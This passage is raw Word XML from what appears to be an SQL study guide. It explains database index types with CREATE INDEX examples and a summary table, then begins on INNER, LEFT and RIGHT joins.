    <w:p w14:paraId="419711B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5B8F2AF0"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named idx_employee_name on the emp_name column of the Employee table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6F1F64"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a Composite Index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28140FE1"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24B1E85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on both the emp_name and emp_salary columns, which will be useful when queries involve conditions on both columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582AC43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sing Index in a Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB5784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have an index on the emp_name column in the Employee table, the database will use that index to quickly locate rows where the employee's name is "John":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD4D60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 WHERE emp_name = 'John';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F246D7E"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there's no index, the database will perform a </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>full table scan</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is slower for large tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23893A3D"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628C0A3A"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s a performance optimization tool used to speed up data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31714BA2"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improves </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> but can slow down </w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>write operations</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and increase storage requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626F434A" w14:textId="77777777" w:rsidR="00925485" w:rsidRPr="00CE4B95" w:rsidRDefault="00925485"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It is essential to balance the number and type of indexes in a database to optimize both query performance and data manipulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BC9CEA" w14:textId="5851F26F"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8C096A">
          <v:rect id="_x0000_i3237" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2105AA44" w14:textId="45D3FB33" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="00674FF6">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="778" w:name="_Toc197867992"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explain different types of </w:t>
      </w:r>
      <w:r w:rsidR="00925485" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ndex</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="778"/>
    </w:p>
    <w:p w14:paraId="55937206" w14:textId="6F2F526D"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re are several types of indexes in SQL, each serving a specific purpose to improve query performance and optimize data retrieval. Here's a detailed explanation of the most common types of indexes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A3D5A"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Primary Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1660722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primary index is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on a table. It enforces uniqueness on the indexed column(s) and ensures that no two rows in the table have the same value for the indexed column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D06F3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5EBBCA03"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que values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6541ACF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the primary key column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395F57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only have one primary index per table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF7DA9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also implies a unique constraint on the column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218970F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0C001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 (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5102E3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id INT PRIMARY KEY,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E8F97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name VARCHAR(50)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B768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31414183"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Unique Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7B0A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499C3E7"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of values in one or more columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD6F6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Can be created explicitly or automatically when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is applied to a column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA881D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D89D56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email ON Employee (emp_email);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCC57B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Non-Unique Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294CC6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unique index allows duplicate values in the indexed column(s). It is used to speed up query performance when you frequently query a column that contains repeated values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B213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014DF71"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n't enforce uniqueness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCCC3F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to speed up SELECT queries involving the indexed column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598614B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D55A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1F012FD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Composite (Multi-Column) Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9534E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posite index is an index that is created on two or more columns of a table. It is used when queries frequently involve conditions on multiple columns in the WHERE clause or in JOIN conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761B6E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15595399"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vers multiple columns in a single index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE8BFA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ffective when queries filter or sort based on multiple columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620DC79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order of the columns in the composite index matters, as the index will be optimized based on that order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF5F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3FEC52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0FDF729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Unique Composite Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3CE9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bination of the UNIQUE and COMPOSITE index types, a unique composite index ensures the uniqueness of values across a combination of columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD4904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EAFFA2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forces uniqueness across multiple columns, not just one.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C04B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when a combination of columns must be unique across the table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DED4E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DAE8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name_department ON Employee (emp_name, department_id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B258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Full-Text Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AB719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ll-text index is used for full-text searches on text-based columns. It allows you to perform efficient searches for words or phrases in text columns (such as articles, blogs, or comments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3103D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56C6CF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Used for searching large text columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9C8210"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by creating an index of words and phrases, making search operations faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E368D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upports advanced features like searching for specific words or phrases, wildcard searches, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD40B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6ACD517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employee_description ON Employee (emp_description);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BAD8C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7. Clustered Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581B646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42DEBC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table’s data is physically sorted and stored on disk based on the clustered index key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BA4E3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table can have only one clustered index, and it is typically created on the primary key column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76584F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4DD9E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most databases, a primary key automatically creates a clustered index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B341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8. Non-Clustered Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DA323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clustered index is an index that creates a separate structure from the data in the table. It stores a pointer to the actual table rows, and you can have multiple non-clustered indexes on a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C55C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874792E"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separate from the actual table data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6759B20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created on any column(s).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77107C7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have multiple non-clustered indexes on a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8459C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74A16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employee_name ON Employee (emp_name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035FAC4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9. Bitmap Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0861EA4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079BBFE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well for columns with low cardinality (few distinct values).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1CF70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ery efficient for AND, OR, and NOT operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3E7F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A17F8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employee_status ON Employee (status);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6D90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0. Spatial Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E1B4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spatial index is used to optimize spatial queries, typically for geographic data (e.g., latitude and longitude) stored in spatial columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDA022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F90C72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involving spatial data types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003576E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GIS (Geographical Information System) applications and other spatial data queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1FD4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3AA9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p w14:paraId="538784E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1. Function-Based Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110357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EB8BFA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based on the result of a function or expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109E154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performance when the query frequently uses the function or expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA439D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64C95A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emp_name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4316BE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2. Reverse Key Index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA1A33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reverse key index reverses the byte order of the key values in the index, which can help avoid hot spots in certain applications where values are sequential (e.g., sequential numbers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FF8DC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7EE335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the bytes of the indexed column values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4833EDE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avoid index block contention in certain applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B00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17CD41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CREATE INDEX idx_rev_emp_id ON Employee (REVERSE(emp_id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE1AED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4330"/>
        <w:gridCol w:w="4201"/>
      </w:tblGrid>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="24EA110B" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58FCDCA5"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77A999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Characteristics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="407D607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tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="31DC4FBE" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="429C90B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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B696FE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with a primary key, ensures uniqueness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66F721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IMARY KEY (emp_id)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="672CF6AA" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BEC080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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58FD1D3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for a column or combination of columns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="01564F4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ail ON Employee (email)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="0EDDFE7C" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42FFD2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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B439E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performance but allows duplicates</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C2692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 ON Employee (name)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="36B23D79" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7578A3B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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302DF7C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on multiple columns for queries with multiple conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E8671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salary ON Employee (name, salary)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="2C8F6449" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EED1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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="180E95C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full-text searches</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0295169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text ON Employee (description)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="7CC7F260" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1407136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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E80EAF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fines the physical order of data in a table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62C363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PRIMARY KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4FA4621E" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DAA35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Clustered Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25E392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 is separate from the table data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2666C51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name ON Employee (name)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="70F252FC" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7054F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itmap Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="060AED2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st for low cardinality columns (few distinct values)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C39655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status ON Employee (status)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="4C22CB6B" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B66825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patial Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46A3E42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for geographic/spatial data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1874991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tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="48E101DE" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DE2B8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nction-Based Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DCF4D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 function or expression applied to a column</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04D70B8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name))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0085313D" w:rsidRPr="0085313D" w14:paraId="0481E3DE" w14:textId="77777777" w:rsidTr="0049473E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B118F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verse Key Index</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BC3592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byte order to avoid contention in sequential data</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4040797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id ON Employee (REVERSE(id))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="060F70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re critical to query performance, and choosing the right type for your use case is key to optimizing the performance of your database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1737C3BC" w14:textId="0D1B642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3238" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEBB077" w14:textId="4D157826" w:rsidR="00E03F39" w:rsidRPr="00CE4B95" w:rsidRDefault="000960BA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="779" w:name="_Toc197867993"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">Explain different types of </w:t>
      </w:r>
      <w:r w:rsidR="00117BFF" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>joins</w:t>
      </w:r>
      <w:r w:rsidR="00E03F39" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="779"/>
    </w:p>
    <w:p w14:paraId="73EBD8BA" w14:textId="3E2C1EF7" w:rsidR="0049473E" w:rsidRPr="0085313D" w:rsidRDefault="0049473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QL, a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INNER JOIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529940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returns only the rows where there is a match in both tables. If there is no match, the row is excluded from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372069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only want the data where there is a matching record in both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717353A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05D3AD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3A6DF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3D1C3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 d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51376BE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only employees who belong to a department will be returned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56336FA2"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FT JOIN (or LEFT OUTER JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4E77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LEFT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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left table, even if there's no matching row in the right table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D380B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9FD7F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7D14838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17076B7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Department d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B2E41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will be returned, and for those who do not belong to any department, the department name will be NULL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E505B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RIGHT JOIN (or RIGHT OUTER JOIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341A3D7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RIGHT JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="0085313D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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right table, even if there’s no matching row in the left table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCC34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815262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E65899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85C8DD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IGHT JOIN Department d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BA7A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departments will be returned, and for those departments that do not have any employees, the employee fields will be NULL.</w:t>
      </w:r>
    </w:p>
